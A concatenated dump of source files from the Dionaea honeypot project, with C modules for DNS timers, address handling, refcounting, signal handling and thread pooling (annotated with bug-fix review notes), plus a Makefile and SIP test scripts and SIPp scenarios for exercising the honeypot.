-------------------------------------------------------------------------------- /modules/xmatch/module.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef __DIONAEA_XMATCH_H 29 | #define __DIONAEA_XMATCH_H 30 | 31 | #include 32 | 33 | struct lcfgx_tree_node; 34 | struct processor_data; 35 | struct connection; 36 | 37 | 38 | struct xmatch_ctx 39 | { 40 | char *patternfile; 41 | xm_string_t **p; 42 | size_t pnum; 43 | size_t maxlen; 44 | xm_fsm_t *fsm; 45 | }; 46 | 47 | void *proc_xmatch_ctx_new(void *cfg); 48 | void proc_xmatch_ctx_free(void *ctx); 49 | void *proc_xmatch_ctx_cfg_new(struct lcfgx_tree_node *node); 50 | void proc_xmatch_on_io_in(struct connection *con, struct processor_data *pd); 51 | 52 | extern struct processor proc_xmatch; 53 | 54 | #endif 55 | -------------------------------------------------------------------------------- /src/LICENSE.openssl: -------------------------------------------------------------------------------- 1 | This LICENSE file is a modification to the main LICENSE file, which is 2 | GPLv2. It applies only to the files in the "src" directory. 3 | 4 | In addition, as a special exception, the copyright holders give 5 | permission to link the code of this program with the OpenSSL library, 6 | and distribute linked combinations including the two. 7 | You must obey the GNU General Public License in all respects 8 | for all of the code used other than OpenSSL. If you modify 9 | file(s) with this exception, you may extend this exception to your 10 | version of the file(s), but you are not obligated to do so. If you 11 | do not wish to do so, delete this exception statement from your 12 | version. If you delete this exception statement from all source 13 | files in the program, then also delete it here. 
14 | 15 | 16 | -------------------------------------------------------------------------------- /src/Makefile.am: -------------------------------------------------------------------------------- 1 | AUTOMAKE_OPTIONS = foreign 2 | 3 | AM_CFLAGS = -I../include -I .. -fno-strict-aliasing 4 | AM_LDFLAGS = 5 | 6 | 7 | bin_PROGRAMS = dionaea 8 | 9 | 10 | dionaea_CFLAGS = ${LIB_EV_CFLAGS} ${LIB_GLIB_CFLAGS} ${LIB_LCFG_CFLAGS} 11 | dionaea_LDFLAGS = ${LIB_EV_LIBS} ${LIB_GLIB_LIBS} ${LIB_LCFG_LIBS} 12 | 13 | dionaea_CFLAGS += ${LIB_SSL_CFLAGS} ${LIB_UDNS_CFLAGS} ${LIB_GC_CFLAGS} 14 | dionaea_LDFLAGS += ${LIB_SSL_LIBS} ${LIB_UDNS_LIBS} ${LIB_GC_LIBS} 15 | 16 | dionaea_CFLAGS += ${AM_CFLAGS} 17 | dionaea_LDFLAGS += ${AM_LDFLAGS} 18 | 19 | 20 | dionaea_SOURCES = dionaea.c 21 | dionaea_SOURCES += dns.c 22 | dionaea_SOURCES += refcount.c 23 | dionaea_SOURCES += node_info.c 24 | dionaea_SOURCES += util.c 25 | dionaea_SOURCES += connection.c 26 | dionaea_SOURCES += modules.c 27 | dionaea_SOURCES += pchild.c 28 | dionaea_SOURCES += log.c 29 | dionaea_SOURCES += signals.c 30 | dionaea_SOURCES += incident.c 31 | dionaea_SOURCES += threads.c 32 | dionaea_SOURCES += bistream.c 33 | dionaea_SOURCES += processor.c 34 | -------------------------------------------------------------------------------- /src/dns.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
 *
 *
 * contact nepenthesdev@gmail.com
 *
 *******************************************************************************/

#include
#include
#include

#include
#include
#include

#include "dionaea.h"
#include "dns.h"


/* The udns socket is readable: let udns read and dispatch the replies.
 * now == 0 leaves it to udns to fetch the current time itself. */
void udns_io_in_cb(EV_P_ struct ev_io *w, int revents)
{
	struct dns_ctx *ctx = g_dionaea->dns->dns;
	dns_ioevent(ctx, 0);
}


/* (Re)arm the single udns timer to fire once, `after` seconds from now. */
static void dns_timer_restart(EV_P_ double after);

/* Timer fired: let udns retransmit/expire queries. dns_timeouts() returns
 * the delay until its next deadline, or -1 when nothing is pending; we
 * either re-arm the timer for that delay or stop it. */
void udns_timeout_cb(EV_P_ struct ev_timer *w, int revents)
{
	/* int dns_timeouts(ctx, int maxwait, time_t now) */
	int next = dns_timeouts(g_dionaea->dns->dns, 3, 0);

	if( next == -1 )
		ev_timer_stop(EV_A_ &g_dionaea->dns->dns_timeout);
	else
		dns_timer_restart(EV_A_ next * 1.0);
}

static void dns_timer_restart(EV_P_ double after)
{
	struct ev_timer *timer = &g_dionaea->dns->dns_timeout;

	ev_timer_stop(EV_A_ timer);
	ev_timer_init(timer, udns_timeout_cb, after, 0.);
	ev_timer_start(EV_A_ timer);
}

/* udns callback asking us to manage its timer. `data` is the ev loop.
 * ctx == NULL or a negative timeout cancels the timer; 0 fires on the next
 * loop iteration; anything larger fires after that many seconds. */
void udns_set_timeout_cb(struct dns_ctx *ctx, int timeout, void *data)
{
	struct ev_loop *loop = data;

	if( ctx == NULL || timeout < 0 )
	{
		ev_timer_stop(loop, &g_dionaea->dns->dns_timeout);
		return;
	}

	dns_timer_restart(loop, (double)timeout);
}
--------------------------------------------------------------------------------
/src/node_info.c:
--------------------------------------------------------------------------------
/********************************************************************************
 *                               Dionaea
 *                           - catches bugs -
 *
 *
 *
 * Copyright (C) 2009  Paul Baecher & Markus Koetter
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
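 *
 *
 * contact nepenthesdev@gmail.com
 *
 *******************************************************************************/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include "node_info.h"
#include "util.h"
#include "log.h"

#define D_LOG_DOMAIN "node_info"


/* Fill node->port, node->ip_string, node->node_string and node->port_string
 * from the socket address `sa` (AF_INET, AF_INET6 or AF_UNIX).
 *
 * Returns false for an unsupported family or if inet_ntop() fails.
 *
 * The port and address are read from `sa` itself. The original read them
 * from node->addr and used `sa` only for the family, which was correct only
 * when the caller passed &node->addr (as node_info_set_port/_set_addr do);
 * any other sa was silently ignored. node->addr is not copied here.
 */
bool node_info_set(struct node_info *node, struct sockaddr_storage *sa)
{
	void *addroff = NULL;

	if( sa->ss_family == PF_INET6 )
	{
		struct sockaddr_in6 *si6 = (struct sockaddr_in6 *)sa;
		node->port = si6->sin6_port;
		addroff = &si6->sin6_addr;
	} else
	if( sa->ss_family == PF_INET )
	{
		struct sockaddr_in *si = (struct sockaddr_in *)sa;
		node->port = si->sin_port;
		addroff = &si->sin_addr;
	} else
	if( sa->ss_family == PF_UNIX )
	{
		struct sockaddr_un *su = (struct sockaddr_un *)sa;
		/* sun_path is not guaranteed to be NUL terminated, so bound the
		 * read to the field instead of trusting "%s" to stop. node->port
		 * is left untouched for unix sockets, as before.
		 * NOTE(review): 108 is a hard-coded buffer size; use
		 * sizeof(node->ip_string) once its declaration is checked. */
		snprintf(node->ip_string, 108, "un://%.*s", (int)sizeof(su->sun_path), su->sun_path);
	} else
	{
		return false;
	}

	if( addroff != NULL &&
	    inet_ntop(sa->ss_family, addroff, node->ip_string, INET6_ADDRSTRLEN) == NULL )
	{
		g_warning("inet_ntop failed (%s)", strerror(errno));
		return false;
	}

	if( sa->ss_family == PF_INET6 )
	{
		/* link-local addresses carry the interface scope: [fe80::1%eth0]:80 */
		if( ipv6_addr_linklocal(&((struct sockaddr_in6 *)sa)->sin6_addr) )
		{
			snprintf(node->node_string,NODE_STRLEN,"[%s%s%s]:%i",node->ip_string,
					 node->iface_scope[0]?"%":"",node->iface_scope[0]?node->iface_scope:"",
					 ntohs(node->port));
		} else
		{
			snprintf(node->node_string,NODE_STRLEN,"[%s]:%i",node->ip_string,
					 ntohs(node->port));
		}
	} else
	if( sa->ss_family == PF_INET )
	{
		snprintf(node->node_string,NODE_STRLEN,"%s:%i",node->ip_string, ntohs(node->port));
	} else
	if( sa->ss_family == PF_UNIX )
	{
		snprintf(node->node_string,NODE_STRLEN,"%s",node->ip_string);
	}

	snprintf(node->port_string,PORT_STRLEN,"%i", ntohs(node->port));

	return true;
}

/* Append a copy of `addr` to the node's list of resolved addresses.
 * The array is grown by one extra slot which is kept NULL so the list is
 * also NULL terminated (the original allocated the slot but never set it). */
void node_info_add_addr(struct node_info *node, const char *addr)
{
	node->dns.resolved_addresses = g_realloc(node->dns.resolved_addresses,( node->dns.resolved_address_count + 2) *(sizeof(char *)));
	node->dns.resolved_addresses[node->dns.resolved_address_count] = g_strdup(addr);
	node->dns.resolved_addresses[node->dns.resolved_address_count + 1] = NULL;
	node->dns.resolved_address_count++;
}


/* Return the next unused resolved address and advance the cursor, or NULL
 * once all addresses have been handed out. */
const char *node_info_get_next_addr(struct node_info *node)
{
	if( node->dns.resolved_address_count == node->dns.current_address )
		return NULL;
	else
		return node->dns.resolved_addresses[node->dns.current_address++];
}

/* Free every resolved address, the array and the hostname, and reset the
 * cursor. Safe to call repeatedly: the original freed node->hostname
 * without clearing it, so a second clear (or a later free) was a double
 * free. */
void node_info_addr_clear(struct node_info *node)
{
	int i;
	for( i = 0; i < node->dns.resolved_address_count; i++ )
	{
		g_free(node->dns.resolved_addresses[i]);
	}
	g_free(node->dns.resolved_addresses);
	node->dns.resolved_addresses = NULL;
	node->dns.resolved_address_count = 0;
	node->dns.current_address=0;
	if( node->hostname != NULL )
	{
		g_free(node->hostname);
		node->hostname = NULL;
	}
}

char *node_info_get_ip_string(struct node_info *node)
{
	return node->ip_string;
}

char *node_info_get_port_string(struct node_info *node)
{
	return node->port_string;
}

/* Change the node's port (host byte order) and rebuild the address and the
 * string representations from the existing ip_string / iface_scope. */
void node_info_set_port(struct node_info *node, uint16_t port)
{
	socklen_t sizeof_sa;
	node->port = htons(port);
	if( !parse_addr(node->ip_string, node->iface_scope, ntohs(node->port), &node->addr, &node->domain, &sizeof_sa) )
		g_debug("error parsing new addr ...");
	else
	{
		node_info_set(node, &node->addr);
		g_debug("new node info %s", node->node_string);
	}
}

/* Change the node's address (textual form) keeping the current port, and
 * rebuild node->addr and the string representations. */
void node_info_set_addr(struct node_info *node, char *addr)
{
	socklen_t sizeof_sa;
	if( !parse_addr(addr, node->iface_scope, ntohs(node->port), &node->addr, &node->domain, &sizeof_sa) )
		g_debug("error parsing new addr ...");
	else
	{
		node_info_set(node, &node->addr);
		g_debug("new node info %s", node->node_string);
	}
}
--------------------------------------------------------------------------------
/src/refcount.c:
--------------------------------------------------------------------------------
/********************************************************************************
 *                               Dionaea
 *                           - catches bugs -
 *
 *
 *
 * Copyright (C) 2009  Paul Baecher & Markus Koetter
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.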
22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include "refcount.h" 30 | 31 | void refcount_init(struct refcount *rc) 32 | { 33 | rc->refs = 0; 34 | rc->mutex = g_mutex_new(); 35 | } 36 | 37 | void refcount_exit(struct refcount *rc) 38 | { 39 | g_mutex_free(rc->mutex); 40 | } 41 | 42 | void refcount_inc(struct refcount *rc) 43 | { 44 | g_mutex_lock(rc->mutex); 45 | rc->refs++; 46 | g_mutex_unlock(rc->mutex); 47 | } 48 | 49 | void refcount_dec(struct refcount *rc) 50 | { 51 | g_mutex_lock(rc->mutex); 52 | rc->refs--; 53 | g_mutex_unlock(rc->mutex); 54 | } 55 | 56 | bool refcount_is_zero(struct refcount *rc) 57 | { 58 | bool ret = false; 59 | 60 | g_mutex_lock(rc->mutex); 61 | if( rc->refs == 0 ) 62 | ret = true; 63 | g_mutex_unlock(rc->mutex); 64 | return ret; 65 | } 66 | 67 | -------------------------------------------------------------------------------- /src/signals.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 
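 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
 *
 *
 * contact nepenthesdev@gmail.com
 *
 *******************************************************************************/

#include "config.h"
#include
#include
#include
#include
#include
#ifdef HAVE_EXECINFO_H
#include
#endif


#include "dionaea.h"
#include "signals.h"
#include "modules.h"
#include "log.h"

/* NOTE(review): the domain is "log", probably copied from log.c; "signals"
 * would match the other sources. Left alone as it changes log output. */
#define D_LOG_DOMAIN "log"

/* SIGINT (libev watcher): leave the event loop; shutdown continues in main. */
void sigint_cb(struct ev_loop *loop, struct ev_signal *w, int revents)
{
	g_warning("%s loop %p w %p revents %i",__PRETTY_FUNCTION__, loop, w, revents);
	ev_break(loop, EVBREAK_ALL);
}

/* SIGHUP (libev watcher): re-read the config file and tell the modules and
 * loggers to reload. Bails out early if the file cannot be opened or parsed;
 * the original logged and then fed the NULL / unparsed config to lcfg_parse
 * and lcfgx_tree_new.
 * NOTE(review): the previous config object is overwritten and never freed,
 * and after a failed reload config.config points at the broken one;
 * restoring the old tree needs the lcfg free API, not used in this file. */
void sighup_cb(struct ev_loop *loop, struct ev_signal *w, int revents)
{
	g_warning("%s loop %p w %p revents %i",__PRETTY_FUNCTION__, loop, w, revents);

	g_info("Reloading config");
	if( (g_dionaea->config.config = lcfg_new(g_dionaea->config.name)) == NULL )
	{
		g_critical("config not found");
		return;
	}

	if( lcfg_parse(g_dionaea->config.config) != lcfg_status_ok )
	{
		g_critical("lcfg error: %s\n", lcfg_error_get(g_dionaea->config.config));
		return;
	}

	g_dionaea->config.root = lcfgx_tree_new(g_dionaea->config.config);


	// modules ...
	modules_hup();

	// loggers hup
	for( GList *it = g_dionaea->logging->loggers; it != NULL; it = it->next )
	{
		struct logger *l = it->data;
		g_message("Logger %p hup %p", l, l->log);
		if( l->hup != NULL )
			l->hup(l, l->data);
	}
}



/* SIGSEGV (libev watcher): run $PREFIX/bin/dionaea-backtrace against our pid
 * and capture its output in a file under /tmp. If the helper succeeds the
 * default SIGSEGV disposition is restored so the next fault terminates the
 * process; if it fails we just return, as before.
 *
 * Fixes over the original: readlink() neither NUL-terminates nor reports
 * truncation, and the original wrote progname[n] with n == -1 on failure
 * (out of bounds) and with n == sizeof(progname) on a long path (one past
 * the end); strrchr() could return NULL. The output file was a predictable
 * /tmp/segv_<name>.<pid>.out opened by the shell with ">", which follows a
 * symlink planted there by another local user; it is now created first
 * with mkstemp() (O_EXCL, 0600) and the shell only truncates a file we own.
 * Running a shell from a faulted process remains inherently best-effort. */
void sigsegv_cb(struct ev_loop *loop, struct ev_signal *w, int revents)
//int segv_handler(int sig)
{
	g_warning("%s loop %p w %p revents %i",__PRETTY_FUNCTION__, loop, w, revents);
	// g_warning("%s sig %i",__PRETTY_FUNCTION__, sig);
	char cmd[256];
	char progname[100];
	char outfile[160];
	char *p;
	ssize_t n;
	int fd;

	n = readlink("/proc/self/exe", progname, sizeof(progname) - 1);
	if( n < 0 )
	{
		g_warning("readlink /proc/self/exe failed");
		return;
	}
	progname[n] = '\0';

	p = strrchr(progname, '/');
	if( p == NULL )
		return;
	*p = '\0';

	snprintf(outfile, sizeof(outfile), "/tmp/segv_%s.%d.XXXXXX", p+1, (int)getpid());
	fd = mkstemp(outfile);
	if( fd < 0 )
	{
		g_warning("could not create backtrace output file %s", outfile);
		return;
	}
	close(fd);

	snprintf(cmd, sizeof(cmd), "%s/bin/dionaea-backtrace %d > %s 2>&1",
			 PREFIX, (int)getpid(), outfile);
	g_warning("writing backtrace to %s", outfile);
	if( system(cmd) )
		return;
	signal(SIGSEGV, SIG_DFL);
	// return 0;
}


/* Raw SIGSEGV handler (signature for signal()): print a backtrace to every
 * logger that has a file descriptor, then exit.
 * NOTE(review): g_mutex_lock() and the logger flush callbacks are not
 * async-signal-safe; if the fault happened while the logging lock was held
 * this deadlocks instead of exiting. The lock is intentionally never
 * released because exit() follows. */
void sigsegv_backtrace_cb(int sig)
{
#ifdef HAVE_EXECINFO_H
#define BACKTRACE_SIZE 32
	void *back[BACKTRACE_SIZE];
	size_t size;

	size = backtrace( back, BACKTRACE_SIZE );

	g_mutex_lock(g_dionaea->logging->lock);
	for( GList *it = g_dionaea->logging->loggers; it != NULL; it = it->next )
	{
		struct logger *l = it->data;

		if( l->fd == -1 )
			continue;

		if( l->flush != NULL )
			l->flush(l, l->data);
		const char *msg =
			"\n"
			"This is the end.\n"
			"This software just had a segmentation fault.\n"
			"The bug you encountered may even be exploitable.\n"
			"If you want to assist in fixing the bug, please send the backtrace below to nepenthesdev@gmail.com.\n"
			"You can create better backtraces with gdb, for more information visit http://dionaea.carnivore.it/#segfault\n"
			"Once you read this message, your tty may be broken, simply type reset, so it will come to life again\n"
			"\n";
		/* write() returns ssize_t; compare with the same signedness */
		if( write(l->fd, msg, strlen(msg)) != (ssize_t)strlen(msg) )
			continue;
		backtrace_symbols_fd(back, size, l->fd);
	}
	// g_mutex_unlock(g_dionaea->logging->lock);
#endif
	exit(-1);
}
--------------------------------------------------------------------------------
/src/threads.c:
--------------------------------------------------------------------------------
/********************************************************************************
 *                               Dionaea
 *                           - catches bugs -
 *
 *
 *
 * Copyright (C) 2009  Paul Baecher & Markus Koetter
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.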
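*
 *
 * contact nepenthesdev@gmail.com
 *
 *******************************************************************************/

/* NOTE(review): the four system header names were lost in this rendered
 * copy; these are what the code below visibly uses (rand, sleep, GLib,
 * libev) — confirm against the upstream file. */
#include <stdlib.h>
#include <unistd.h>
#include <glib.h>
#include <ev.h>


#include "dionaea.h"
#include "threads.h"
#include "log.h"
#include "incident.h"
#include "connection.h"

#define D_LOG_DOMAIN "thread"


/*
 * GThreadPool entry point: run the queued job, then release its
 * descriptor.
 *
 * @param data      a struct thread from thread_new(); freed here
 * @param user_data pool user data; unused
 */
void threadpool_wrapper(gpointer data, gpointer user_data)
{
	struct thread *t = data;
#ifdef DEBUG
	GTimer *timer = g_timer_new();
#endif
	t->function(t->con, t->data);
#ifdef DEBUG
	g_timer_stop(timer);
	/* g_timer_elapsed() reports seconds; scale so the "ms" in the message
	 * is true (the original logged raw seconds under an "ms" label). */
	g_debug("Thread fn %p con %p data %p took %f ms", t->function, t->con, t->data, g_timer_elapsed(timer, NULL) * 1000.0);
	g_timer_destroy(timer);
#endif
	g_free(data);
}

/*
 * ev_async watcher: drain g_dionaea->threads->cmds on the loop thread,
 * running and freeing each queued async_cmd. Presumably this is how
 * worker threads hand results back to the event loop.
 *
 * @param loop    the libev loop the watcher runs on
 * @param w       the async watcher that was signalled
 * @param revents libev event mask; unused
 */
void trigger_cb(struct ev_loop *loop, struct ev_async *w, int revents)
{
	GAsyncQueue *aq = g_async_queue_ref(g_dionaea->threads->cmds);
	struct async_cmd *cmd;
	while( (cmd = g_async_queue_try_pop(aq)) != NULL )
	{
		cmd->function(cmd->data);
		g_free(cmd);
	}
	g_async_queue_unref(aq);
}

/*
 * Test job for the pool: sleep a pseudo-random 0–9 seconds and log it.
 * Uses unseeded rand(), so the sequence repeats across runs.
 *
 * @param a unused
 * @param b unused
 */
void thread_test(gpointer a, gpointer b)
{
	int s = rand()%10;
	g_debug("%p sleeping %i", g_thread_self(), s);
	sleep(s);
	g_debug("%p done", g_thread_self());
}

/*
 * Periodic watcher: while more jobs are queued than the pool has
 * threads, block the event loop in one-second steps until the backlog
 * drains. As the log message says, this deliberately suspends *all*
 * activity on the loop thread, including accepting new connections.
 *
 * @param loop    the libev loop the watcher runs on
 * @param w       the periodic watcher
 * @param revents libev event mask; unused
 */
void surveillance_cb(struct ev_loop *loop, struct ev_periodic *w, int revents)
{
	/* g_debug("%s %i %i",
			__PRETTY_FUNCTION__,
			g_thread_pool_unprocessed(g_dionaea->threads->pool),
			g_thread_pool_get_max_threads(g_dionaea->threads->pool));
	*/
	while( g_thread_pool_unprocessed(g_dionaea->threads->pool) >
		   g_thread_pool_get_max_threads(g_dionaea->threads->pool) )
	{
		g_critical("Threadpool is crowded %i/%i, suspending *all* activity",
				   g_thread_pool_unprocessed(g_dionaea->threads->pool),
				   g_thread_pool_get_max_threads(g_dionaea->threads->pool));
		sleep(1);
	}
}


/*
 * Allocate a job descriptor for the thread pool.
 *
 * @param con      connection the job belongs to (stored, not referenced)
 * @param data     opaque argument passed to function
 * @param function called as function(con, data) by threadpool_wrapper()
 * @return a zeroed, filled-in struct thread; freed by threadpool_wrapper()
 */
struct thread *thread_new(struct connection *con, void *data, GFunc function)
{
	struct thread *t = g_malloc0(sizeof(struct thread));
	t->con = con;
	t->data = data;
	t->function = function;
	return t;
}


/*
 * Allocate a command to be run on the loop thread by trigger_cb().
 *
 * @param function called as function(data)
 * @param data     opaque argument
 * @return a zeroed, filled-in struct async_cmd; freed after it runs
 */
struct async_cmd *async_cmd_new(async_cmd_cb function, void *data)
{
	struct async_cmd *cmd = g_malloc0(sizeof(struct async_cmd));
	cmd->data = data;
	cmd->function = function;
	return cmd;
}

/*
 * Release a command that was never queued (queued ones are freed by
 * trigger_cb()).
 *
 * @param cmd the command to free
 */
void async_cmd_free(struct async_cmd *cmd)
{
	g_free(cmd);
}



/*
 * async_cmd body: deliver an incident on the loop thread, drop the
 * connection reference stored under its "con" key (if any), and free it.
 *
 * @param data a struct incident
 */
void async_incident_report(void *data)
{
	struct incident *i = data;
	incident_report(i);
	struct connection *con;
	if( incident_value_con_get(i, "con", &con ) )
		connection_unref(con);
	incident_free(i);
}
-------------------------------------------------------------------------------- /tests/sip/README: --------------------------------------------------------------------------------
How to run a test
=================

You can run the tests manually and set all required values and paths.

export TOOL_SMAP=/path/to/smap/smap
export TOOL_SMAP_BASE=/path/to/smap/
export TOOL_SIPP=/path/to/sipp

LHOST=10.0.0.1 RHOST=10.0.0.2 ./run-tests.sh run

OR

You can run the test using BackTrack 4 or 5. In this case all required paths are preconfigured.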
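BackTrack 4:

LHOST=10.0.0.1 RHOST=10.0.0.2 ./run-bt4.sh run

BackTrack 5:

LHOST=10.0.0.1 RHOST=10.0.0.2 ./run-bt5.sh run

-------------------------------------------------------------------------------- /tests/sip/run-bt4.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Set some environment vars for backtrack 4
# (BackTrack 4 has no preconfigured sipp path; TOOL_SIPP must come from
# the caller's environment, see the README.)

export TOOL_SMAP=/pentest/voip/smap/smap
export TOOL_SMAP_BASE=/pentest/voip/smap

# "$@" keeps each argument intact; bare $@ re-splits on whitespace.
./run-tests.sh "$@"
-------------------------------------------------------------------------------- /tests/sip/run-bt5.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Set some environment vars for backtrack 5

export TOOL_SMAP=/pentest/voip/smap/smap
export TOOL_SMAP_BASE=/pentest/voip/smap
export TOOL_SIPP=/pentest/voip/sipp/sipp

# "$@" keeps each argument intact; bare $@ re-splits on whitespace.
./run-tests.sh "$@"
-------------------------------------------------------------------------------- /tests/sip/sipp/error_sdp.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | ;tag=[pid]SIPpTag00[call_number] 11 | To: sut 12 | Call-ID: [call_id] 13 | CSeq: 1 INVITE 14 | Contact: sip:sipp@[local_ip]:[local_port] 15 | Max-Forwards: 70 16 | Subject: Performance Test 17 | Content-Type: application/sdp 18 | Content-Length: [len] 19 | 20 | v=0 21 | o=user1 53655765 2353687637 IN IP[local_ip_type] [local_ip] 22 | s=- 23 | c=IN IP[media_ip_type] [media_ip] 24 | t= 25 | m=audio [media_port] RTP/AVP 0 26 | a=rtpmap:0 PCMU/8000 27 | ]]> 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /tests/sip/sipp/newmethod.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ;tag=[call_number] 9 | To: 10 | Call-ID: [call_id] 11 | CSeq: [cseq] 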
NEWMETHOD 12 | Contact: sip:sipp@[local_ip]:[local_port] 13 | Max-Forwards: 10 14 | User-Agent: SIPp/Linux 15 | Content-Length: 0 16 | Accept: text/plain 17 | ]]> 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /tests/sip/sipp/options.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ;tag=[call_number] 9 | To: 10 | Call-ID: [call_id] 11 | CSeq: [cseq] OPTIONS 12 | Contact: sip:sipp@[local_ip]:[local_port] 13 | Max-Forwards: 10 14 | User-Agent: SIPp/Linux 15 | Content-Length: 0 16 | Accept: text/plain 17 | ]]> 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /tests/sip/sipp/register.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ;tag=[call_number] 9 | To: 10 | Call-ID: [call_id] 11 | CSeq: [cseq] REGISTER 12 | Contact: sip:[field0]@[local_ip]:[local_port] 13 | Max-Forwards: 10 14 | Expires: 300 15 | User-Agent: SIPp/Linux 16 | Content-Length: 0 17 | ]]> 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | ;tag=[call_number] 30 | To: 31 | Call-ID: [call_id] 32 | CSeq: [cseq] REGISTER 33 | Contact: sip:[field0]@[local_ip]:[local_port] 34 | Max-Forwards: 10 35 | Expires: 0 36 | User-Agent: SIPp/Linux 37 | Content-Length: 0 38 | ]]> 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /tests/sip/sipp/register_pw.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ;tag=[call_number] 9 | To: 10 | Call-ID: [call_id] 11 | CSeq: [cseq] REGISTER 12 | Contact: sip:[field0]@[local_ip]:[local_port] 13 | Max-Forwards: 10 14 | Expires: 300 15 | User-Agent: SIPp/Linux 16 | Content-Length: 0 17 | ]]> 18 | 19 | 20 | 21 | 22 | 23 | 24 | 
